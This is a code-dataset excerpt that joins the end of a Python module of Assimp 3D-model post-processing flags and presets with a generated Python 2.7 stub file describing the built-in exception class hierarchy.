# <tt>#AI_CONFIG_PP_SLM_VERTEX_LIMIT<tt> and <tt>#AI_CONFIG_PP_SLM_TRIANGLE_LIMIT<tt>
# settings. The default values are <tt>#AI_SLM_DEFAULT_MAX_VERTICES<tt> and
# <tt>#AI_SLM_DEFAULT_MAX_TRIANGLES<tt>.
#
# Note that splitting is generally a time-consuming task, but only if there's
# something to split. The use of this step is recommended for most users.
#
aiProcess_SplitLargeMeshes = 0x80
## <hr>Removes the node graph and pre-transforms all vertices with
# the local transformation matrices of their nodes.
#
# The output scene still contains nodes, however there is only a
# root node with children, each one referencing only one mesh,
# and each mesh referencing one material. For rendering, you can
# simply render all meshes in order - you don't need to pay
# attention to local transformations and the node hierarchy.
# Animations are removed during this step.
# This step is intended for applications without a scenegraph.
# The step CAN cause some problems: if e.g. a mesh of the asset
# contains normals and another, using the same material index, does not,
# they will be brought together, but the first meshes's part of
# the normal list is zeroed. However, these artifacts are rare.
# @note The <tt>#AI_CONFIG_PP_PTV_NORMALIZE<tt> configuration property
# can be set to normalize the scene's spatial dimension to the -1...1
# range.
#
aiProcess_PreTransformVertices = 0x100
## <hr>Limits the number of bones simultaneously affecting a single vertex
# to a maximum value.
#
# If any vertex is affected by more than the maximum number of bones, the least
# important vertex weights are removed and the remaining vertex weights are
# renormalized so that the weights still sum up to 1.
# The default bone weight limit is 4 (defined as <tt>#AI_LMW_MAX_WEIGHTS<tt> in
# config.h), but you can use the <tt>#AI_CONFIG_PP_LBW_MAX_WEIGHTS<tt> setting to
# supply your own limit to the post processing step.
#
# If you intend to perform the skinning in hardware, this post processing
# step might be of interest to you.
#
aiProcess_LimitBoneWeights = 0x200
## <hr>Validates the imported scene data structure.
# This makes sure that all indices are valid, all animations and
# bones are linked correctly, all material references are correct .. etc.
#
# It is recommended that you capture Assimp's log output if you use this flag,
# so you can easily find out what's wrong if a file fails the
# validation. The validator is quite strict and will find #all#
# inconsistencies in the data structure... It is recommended that plugin
# developers use it to debug their loaders. There are two types of
# validation failures:
# <ul>
# <li>Error: There's something wrong with the imported data. Further
# postprocessing is not possible and the data is not usable at all.
# The import fails. #Importer::GetErrorString() or #aiGetErrorString()
# carry the error message around.<li>
# <li>Warning: There are some minor issues (e.g. 1000000 animation
# keyframes with the same time), but further postprocessing and use
# of the data structure is still safe. Warning details are written
# to the log file, <tt>#AI_SCENE_FLAGS_VALIDATION_WARNING<tt> is set
# in #aiScene::mFlags<li>
# <ul>
#
# This post-processing step is not time-consuming. Its use is not
# compulsory, but recommended.
#
aiProcess_ValidateDataStructure = 0x400
## <hr>Reorders triangles for better vertex cache locality.
#
# The step tries to improve the ACMR (average post-transform vertex cache
# miss ratio) for all meshes. The implementation runs in O(n) and is
# roughly based on the 'tipsify' algorithm (see <a href="
# http:www.cs.princeton.edugfxpubsSander_2007_%3ETRtipsy.pdf">this
# paper<a>).
#
# If you intend to render huge models in hardware, this step might
# be of interest to you. The <tt>#AI_CONFIG_PP_ICL_PTCACHE_SIZE<tt>config
# setting can be used to fine-tune the cache optimization.
#
aiProcess_ImproveCacheLocality = 0x800
## <hr>Searches for redundantunreferenced materials and removes them.
#
# This is especially useful in combination with the
# #aiProcess_PretransformVertices and #aiProcess_OptimizeMeshes flags.
# Both join small meshes with equal characteristics, but they can't do
# their work if two meshes have different materials. Because several
# material settings are lost during Assimp's import filters,
# (and because many exporters don't check for redundant materials), huge
# models often have materials which are are defined several times with
# exactly the same settings.
#
# Several material settings not contributing to the final appearance of
# a surface are ignored in all comparisons (e.g. the material name).
# So, if you're passing additional information through the
# content pipeline (probably using #magic# material names), don't
# specify this flag. Alternatively take a look at the
# <tt>#AI_CONFIG_PP_RRM_EXCLUDE_LIST<tt> setting.
#
aiProcess_RemoveRedundantMaterials = 0x1000
## <hr>This step tries to determine which meshes have normal vectors
# that are facing inwards and inverts them.
#
# The algorithm is simple but effective:
# the bounding box of all vertices + their normals is compared against
# the volume of the bounding box of all vertices without their normals.
# This works well for most objects, problems might occur with planar
# surfaces. However, the step tries to filter such cases.
# The step inverts all in-facing normals. Generally it is recommended
# to enable this step, although the result is not always correct.
#
aiProcess_FixInfacingNormals = 0x2000
## <hr>This step splits meshes with more than one primitive type in
# homogeneous sub-meshes.
#
# The step is executed after the triangulation step. After the step
# returns, just one bit is set in aiMesh::mPrimitiveTypes. This is
# especially useful for real-time rendering where point and line
# primitives are often ignored or rendered separately.
# You can use the <tt>#AI_CONFIG_PP_SBP_REMOVE<tt> option to specify which
# primitive types you need. This can be used to easily exclude
# lines and points, which are rarely used, from the import.
#
aiProcess_SortByPType = 0x8000
## <hr>This step searches all meshes for degenerate primitives and
# converts them to proper lines or points.
#
# A face is 'degenerate' if one or more of its points are identical.
# To have the degenerate stuff not only detected and collapsed but
# removed, try one of the following procedures:
# <br><b>1.<b> (if you support lines and points for rendering but don't
# want the degenerates)<br>
# <ul>
# <li>Specify the #aiProcess_FindDegenerates flag.
# <li>
# <li>Set the <tt>AI_CONFIG_PP_FD_REMOVE<tt> option to 1. This will
# cause the step to remove degenerate triangles from the import
# as soon as they're detected. They won't pass any further
# pipeline steps.
# <li>
# <ul>
# <br><b>2.<b>(if you don't support lines and points at all)<br>
# <ul>
# <li>Specify the #aiProcess_FindDegenerates flag.
# <li>
# <li>Specify the #aiProcess_SortByPType flag. This moves line and
# point primitives to separate meshes.
# <li>
# <li>Set the <tt>AI_CONFIG_PP_SBP_REMOVE<tt> option to
# @code aiPrimitiveType_POINTS | aiPrimitiveType_LINES
# @endcode to cause SortByPType to reject point
# and line meshes from the scene.
# <li>
# <ul>
# @note Degenerate polygons are not necessarily evil and that's why
# they're not removed by default. There are several file formats which
# don't support lines or points, and some exporters bypass the
# format specification and write them as degenerate triangles instead.
#
aiProcess_FindDegenerates = 0x10000
## <hr>This step searches all meshes for invalid data, such as zeroed
# normal vectors or invalid UV coords and removesfixes them. This is
# intended to get rid of some common exporter errors.
#
# This is especially useful for normals. If they are invalid, and
# the step recognizes this, they will be removed and can later
# be recomputed, i.e. by the #aiProcess_GenSmoothNormals flag.<br>
# The step will also remove meshes that are infinitely small and reduce
# animation tracks consisting of hundreds if redundant keys to a single
# key. The <tt>AI_CONFIG_PP_FID_ANIM_ACCURACY<tt> config property decides
# the accuracy of the check for duplicate animation tracks.
#
aiProcess_FindInvalidData = 0x20000
## <hr>This step converts non-UV mappings (such as spherical or
# cylindrical mapping) to proper texture coordinate channels.
#
# Most applications will support UV mapping only, so you will
# probably want to specify this step in every case. Note that Assimp is not
# always able to match the original mapping implementation of the
# 3D app which produced a model perfectly. It's always better to let the
# modelling app compute the UV channels - 3ds max, Maya, Blender,
# LightWave, and Modo do this for example.
#
# @note If this step is not requested, you'll need to process the
# <tt>#AI_MATKEY_MAPPING<tt> material property in order to display all assets
# properly.
#
aiProcess_GenUVCoords = 0x40000
## <hr>This step applies per-texture UV transformations and bakes
# them into stand-alone vtexture coordinate channels.
#
# UV transformations are specified per-texture - see the
# <tt>#AI_MATKEY_UVTRANSFORM<tt> material key for more information.
# This step processes all textures with
# transformed input UV coordinates and generates a new (pre-transformed) UV channel
# which replaces the old channel. Most applications won't support UV
# transformations, so you will probably want to specify this step.
#
# @note UV transformations are usually implemented in real-time apps by
# transforming texture coordinates at vertex shader stage with a 3x3
# (homogenous) transformation matrix.
#
aiProcess_TransformUVCoords = 0x80000
## <hr>This step searches for duplicate meshes and replaces them
# with references to the first mesh.
#
# This step takes a while, so don't use it if speed is a concern.
# Its main purpose is to workaround the fact that many export
# file formats don't support instanced meshes, so exporters need to
# duplicate meshes. This step removes the duplicates again. Please
# note that Assimp does not currently support per-node material
# assignment to meshes, which means that identical meshes with
# different materials are currently #not# joined, although this is
# planned for future versions.
#
aiProcess_FindInstances = 0x100000
## <hr>A postprocessing step to reduce the number of meshes.
#
# This will, in fact, reduce the number of draw calls.
#
# This is a very effective optimization and is recommended to be used
# together with #aiProcess_OptimizeGraph, if possible. The flag is fully
# compatible with both #aiProcess_SplitLargeMeshes and #aiProcess_SortByPType.
#
aiProcess_OptimizeMeshes = 0x200000
## <hr>A postprocessing step to optimize the scene hierarchy.
#
# Nodes without animations, bones, lights or cameras assigned are
# collapsed and joined.
#
# Node names can be lost during this step. If you use special 'tag nodes'
# to pass additional information through your content pipeline, use the
# <tt>#AI_CONFIG_PP_OG_EXCLUDE_LIST<tt> setting to specify a list of node
# names you want to be kept. Nodes matching one of the names in this list won't
# be touched or modified.
#
# Use this flag with caution. Most simple files will be collapsed to a
# single node, so complex hierarchies are usually completely lost. This is not
# useful for editor environments, but probably a very effective
# optimization if you just want to get the model data, convert it to your
# own format, and render it as fast as possible.
#
# This flag is designed to be used with #aiProcess_OptimizeMeshes for best
# results.
#
# @note 'Crappy' scenes with thousands of extremely small meshes packed
# in deeply nested nodes exist for almost all file formats.
# #aiProcess_OptimizeMeshes in combination with #aiProcess_OptimizeGraph
# usually fixes them all and makes them renderable.
#
aiProcess_OptimizeGraph = 0x400000
## <hr>This step flips all UV coordinates along the y-axis and adjusts
# material settings and bitangents accordingly.
#
# <b>Output UV coordinate system:<b>
# @code
# 0y|0y ---------- 1x|0y
# | |
# | |
# | |
# 0x|1y ---------- 1x|1y
# @endcode
#
# You'll probably want to consider this flag if you use Direct3D for
# rendering. The #aiProcess_ConvertToLeftHanded flag supersedes this
# setting and bundles all conversions typically required for D3D-based
# applications.
#
aiProcess_FlipUVs = 0x800000
## <hr>This step adjusts the output face winding order to be CW.
#
# The default face winding order is counter clockwise (CCW).
#
# <b>Output face order:<b>
# @code
# x2
#
# x0
# x1
# @endcode
#
aiProcess_FlipWindingOrder = 0x1000000
## <hr>This step splits meshes with many bones into sub-meshes so that each
# su-bmesh has fewer or as many bones as a given limit.
#
aiProcess_SplitByBoneCount = 0x2000000
## <hr>This step removes bones losslessly or according to some threshold.
#
# In some cases (i.e. formats that require it) exporters are forced to
# assign dummy bone weights to otherwise static meshes assigned to
# animated meshes. Full, weight-based skinning is expensive while
# animating nodes is extremely cheap, so this step is offered to clean up
# the data in that regard.
#
# Use <tt>#AI_CONFIG_PP_DB_THRESHOLD<tt> to control this.
# Use <tt>#AI_CONFIG_PP_DB_ALL_OR_NONE<tt> if you want bones removed if and
# only if all bones within the scene qualify for removal.
#
aiProcess_Debone = 0x4000000
aiProcess_GenEntityMeshes = 0x100000
aiProcess_OptimizeAnimations = 0x200000
aiProcess_FixTexturePaths = 0x200000
## @def aiProcess_ConvertToLeftHanded
# @brief Shortcut flag for Direct3D-based applications.
#
# Supersedes the #aiProcess_MakeLeftHanded and #aiProcess_FlipUVs and
# #aiProcess_FlipWindingOrder flags.
# The output data matches Direct3D's conventions: left-handed geometry, upper-left
# origin for UV coordinates and finally clockwise face order, suitable for CCW culling.
#
# @deprecated
#
aiProcess_ConvertToLeftHanded = ( \
aiProcess_MakeLeftHanded | \
aiProcess_FlipUVs | \
aiProcess_FlipWindingOrder | \
0 )
## @def aiProcessPreset_TargetRealtimeUse_Fast
# @brief Default postprocess configuration optimizing the data for real-time rendering.
#
# Applications would want to use this preset to load models on end-user PCs,
# maybe for direct use in game.
#
# If you're using DirectX, don't forget to combine this value with
# the #aiProcess_ConvertToLeftHanded step. If you don't support UV transformations
# in your application apply the #aiProcess_TransformUVCoords step, too.
# @note Please take the time to read the docs for the steps enabled by this preset.
# Some of them offer further configurable properties, while some of them might not be of
# use for you so it might be better to not specify them.
#
aiProcessPreset_TargetRealtime_Fast = ( \
aiProcess_CalcTangentSpace | \
aiProcess_GenNormals | \
aiProcess_JoinIdenticalVertices | \
aiProcess_Triangulate | \
aiProcess_GenUVCoords | \
aiProcess_SortByPType | \
0 )
## @def aiProcessPreset_TargetRealtime_Quality
# @brief Default postprocess configuration optimizing the data for real-time rendering.
#
# Unlike #aiProcessPreset_TargetRealtime_Fast, this configuration
# performs some extra optimizations to improve rendering speed and
# to minimize memory usage. It could be a good choice for a level editor
# environment where import speed is not so important.
#
# If you're using DirectX, don't forget to combine this value with
# the #aiProcess_ConvertToLeftHanded step. If you don't support UV transformations
# in your application apply the #aiProcess_TransformUVCoords step, too.
# @note Please take the time to read the docs for the steps enabled by this preset.
# Some of them offer further configurable properties, while some of them might not be
# of use for you so it might be better to not specify them.
#
aiProcessPreset_TargetRealtime_Quality = ( \
aiProcess_CalcTangentSpace | \
aiProcess_GenSmoothNormals | \
aiProcess_JoinIdenticalVertices | \
aiProcess_ImproveCacheLocality | \
aiProcess_LimitBoneWeights | \
aiProcess_RemoveRedundantMaterials | \
aiProcess_SplitLargeMeshes | \
aiProcess_Triangulate | \
aiProcess_GenUVCoords | \
aiProcess_SortByPType | \
aiProcess_FindDegenerates | \
aiProcess_FindInvalidData | \
0 )
## @def aiProcessPreset_TargetRealtime_MaxQuality
# @brief Default postprocess configuration optimizing the data for real-time rendering.
#
# This preset enables almost every optimization step to achieve perfectly
# optimized data. It's your choice for level editor environments where import speed
# is not important.
#
# If you're using DirectX, don't forget to combine this value with
# the #aiProcess_ConvertToLeftHanded step. If you don't support UV transformations
# in your application, apply the #aiProcess_TransformUVCoords step, too.
# @note Please take the time to read the docs for the steps enabled by this preset.
# Some of them offer further configurable properties, while some of them might not be
# of use for you so it might be better to not specify them.
#
aiProcessPreset_TargetRealtime_MaxQuality = ( \
aiProcessPreset_TargetRealtime_Quality | \
aiProcess_FindInstances | \
aiProcess_ValidateDataStructure | \
aiProcess_OptimizeMeshes | \
0 )
| agpl-3.0 |
sabi0/intellij-community | python/testData/MockSdk2.7/python_stubs/exceptions.py | 27 | 24263 | # encoding: utf-8
# module exceptions
# from (built-in)
# by generator 1.138
"""
Python's standard exception class hierarchy.
Exceptions found here are defined both in the exceptions module and the
built-in namespace. It is recommended that user-defined exceptions
inherit from Exception. See the documentation for the exception
inheritance hierarchy.
"""
# no imports
# no functions
# classes
class BaseException(object):
""" Common base class for all exceptions """
def __delattr__(self, name): # real signature unknown; restored from __doc__
""" x.__delattr__('name') <==> del x.name """
pass
def __getattribute__(self, name): # real signature unknown; restored from __doc__
""" x.__getattribute__('name') <==> x.name """
pass
def __getitem__(self, y): # real signature unknown; restored from __doc__
""" x.__getitem__(y) <==> x[y] """
pass
def __getslice__(self, i, j): # real signature unknown; restored from __doc__
"""
x.__getslice__(i, j) <==> x[i:j]
Use of negative indices is not supported.
"""
pass
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
def __reduce__(self, *args, **kwargs): # real signature unknown
pass
def __repr__(self): # real signature unknown; restored from __doc__
""" x.__repr__() <==> repr(x) """
pass
def __setattr__(self, name, value): # real signature unknown; restored from __doc__
""" x.__setattr__('name', value) <==> x.name = value """
pass
def __setstate__(self, *args, **kwargs): # real signature unknown
pass
def __str__(self): # real signature unknown; restored from __doc__
""" x.__str__() <==> str(x) """
pass
def __unicode__(self): # known case of exceptions.BaseException.__unicode__
# no doc
return u""
args = property(lambda self: tuple())
""":type: tuple"""
message = property(lambda self: '', lambda self, v: None, lambda self: None)
""":type: string"""
__dict__ = None # (!) real value is ''
class Exception(BaseException):
""" Common base class for all non-exit exceptions. """
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
class StandardError(Exception):
"""
Base class for all standard Python exceptions that do not represent
interpreter exiting.
"""
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
class ArithmeticError(StandardError):
""" Base class for arithmetic errors. """
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
class AssertionError(StandardError):
""" Assertion failed. """
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
class AttributeError(StandardError):
""" Attribute not found. """
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
class BufferError(StandardError):
""" Buffer error. """
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
class Warning(Exception):
""" Base class for warning categories. """
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
class BytesWarning(Warning):
"""
Base class for warnings about bytes and buffer related problems, mostly
related to conversion from str or comparing to str.
"""
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
class DeprecationWarning(Warning):
""" Base class for warnings about deprecated features. """
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
class EnvironmentError(StandardError):
""" Base class for I/O related errors. """
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
def __reduce__(self, *args, **kwargs): # real signature unknown
pass
def __str__(self): # real signature unknown; restored from __doc__
""" x.__str__() <==> str(x) """
pass
errno = property(lambda self: 0, lambda self, v: None, lambda self: None)
"""exception errno
:type: int
"""
filename = property(lambda self: '', lambda self, v: None, lambda self: None)
"""exception filename
:type: string
"""
strerror = property(lambda self: 0, lambda self, v: None, lambda self: None)
"""exception strerror
:type: int
"""
class EOFError(StandardError):
""" Read beyond end of file. """
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
class FloatingPointError(ArithmeticError):
""" Floating point operation failed. """
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
class FutureWarning(Warning):
"""
Base class for warnings about constructs that will change semantically
in the future.
"""
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
class GeneratorExit(BaseException):
""" Request that a generator exit. """
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
class ImportError(StandardError):
""" Import can't find module, or can't find name in module. """
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
class ImportWarning(Warning):
""" Base class for warnings about probable mistakes in module imports """
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
class SyntaxError(StandardError):
""" Invalid syntax. """
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
def __str__(self): # real signature unknown; restored from __doc__
""" x.__str__() <==> str(x) """
pass
filename = property(lambda self: '', lambda self, v: None, lambda self: None)
"""exception filename
:type: string
"""
lineno = property(lambda self: 0, lambda self, v: None, lambda self: None)
"""exception lineno
:type: int
"""
msg = property(lambda self: '', lambda self, v: None, lambda self: None)
"""exception msg
:type: string
"""
offset = property(lambda self: 0, lambda self, v: None, lambda self: None)
"""exception offset
:type: int
"""
print_file_and_line = property(lambda self: True, lambda self, v: None, lambda self: None)
"""exception print_file_and_line
:type: bool
"""
text = property(lambda self: '', lambda self, v: None, lambda self: None)
"""exception text
:type: string
"""
class IndentationError(SyntaxError):
""" Improper indentation. """
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
class LookupError(StandardError):
""" Base class for lookup errors. """
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
class IndexError(LookupError):
""" Sequence index out of range. """
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
class IOError(EnvironmentError):
""" I/O operation failed. """
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
class KeyboardInterrupt(BaseException):
""" Program interrupted by user. """
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
class KeyError(LookupError):
""" Mapping key not found. """
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
def __str__(self): # real signature unknown; restored from __doc__
""" x.__str__() <==> str(x) """
pass
class MemoryError(StandardError):
""" Out of memory. """
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
class NameError(StandardError):
""" Name not found globally. """
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
class RuntimeError(StandardError):
""" Unspecified run-time error. """
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
class NotImplementedError(RuntimeError):
""" Method or function hasn't been implemented yet. """
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
class OSError(EnvironmentError):
""" OS system call failed. """
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
class OverflowError(ArithmeticError):
""" Result too large to be represented. """
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
class PendingDeprecationWarning(Warning):
"""
Base class for warnings about features which will be deprecated
in the future.
"""
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
class ReferenceError(StandardError):
""" Weak ref proxy used after referent went away. """
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
class RuntimeWarning(Warning):
""" Base class for warnings about dubious runtime behavior. """
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
class StopIteration(Exception):
""" Signal the end from iterator.next(). """
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
class SyntaxWarning(Warning):
""" Base class for warnings about dubious syntax. """
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
class SystemError(StandardError):
"""
Internal error in the Python interpreter.
Please report this to the Python maintainer, along with the traceback,
the Python version, and the hardware/OS platform and version.
"""
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
class SystemExit(BaseException):
""" Request to exit from the interpreter. """
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
code = property(lambda self: object(), lambda self, v: None, lambda self: None)
class TabError(IndentationError):
""" Improper mixture of spaces and tabs. """
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
class TypeError(StandardError):
""" Inappropriate argument type. """
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
class UnboundLocalError(NameError):
""" Local name referenced but not bound to a value. """
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
class ValueError(StandardError):
""" Inappropriate argument value (of correct type). """
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
class UnicodeError(ValueError):
""" Unicode related error. """
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
class UnicodeDecodeError(UnicodeError):
""" Unicode decoding error. """
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
def __str__(self): # real signature unknown; restored from __doc__
""" x.__str__() <==> str(x) """
pass
encoding = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""exception encoding"""
end = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""exception end"""
object = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""exception object"""
reason = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""exception reason"""
start = property(lambda self: object(), lambda self, v: None, lambda self: None) # default
"""exception start"""
class UnicodeEncodeError(UnicodeError):
""" Unicode encoding error. """
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
def __str__(self): # real signature unknown; restored from __doc__
""" x.__str__() <==> str(x) """
pass
encoding = property(lambda self: '', lambda self, v: None, lambda self: None)
"""exception encoding
:type: string
"""
end = property(lambda self: 0, lambda self, v: None, lambda self: None)
"""exception end
:type: int
"""
object = property(lambda self: object(), lambda self, v: None, lambda self: None)
reason = property(lambda self: '', lambda self, v: None, lambda self: None)
"""exception reason
:type: string
"""
start = property(lambda self: 0, lambda self, v: None, lambda self: None)
"""exception start
:type: int
"""
class UnicodeTranslateError(UnicodeError):
""" Unicode translation error. """
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
def __str__(self): # real signature unknown; restored from __doc__
""" x.__str__() <==> str(x) """
pass
encoding = property(lambda self: '', lambda self, v: None, lambda self: None)
"""exception encoding
:type: string
"""
end = property(lambda self: 0, lambda self, v: None, lambda self: None)
"""exception end
:type: int
"""
object = property(lambda self: object(), lambda self, v: None, lambda self: None)
reason = property(lambda self: '', lambda self, v: None, lambda self: None)
"""exception reason
:type: string
"""
start = property(lambda self: 0, lambda self, v: None, lambda self: None)
"""exception start
:type: int
"""
class UnicodeWarning(Warning):
"""
Base class for warnings about Unicode related problems, mostly
related to conversion problems.
"""
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
""" T.__new__(S, ...) -> a new object with type S, a subtype of T """
pass
class UserWarning(Warning):
""" Base class for warnings generated by user code. """
def __init__(self, *args, **kwargs): # real signature unknown
pass
@staticmethod # known case of __new__
def __new__(S, *more): # real signature unknown; restored from __doc__
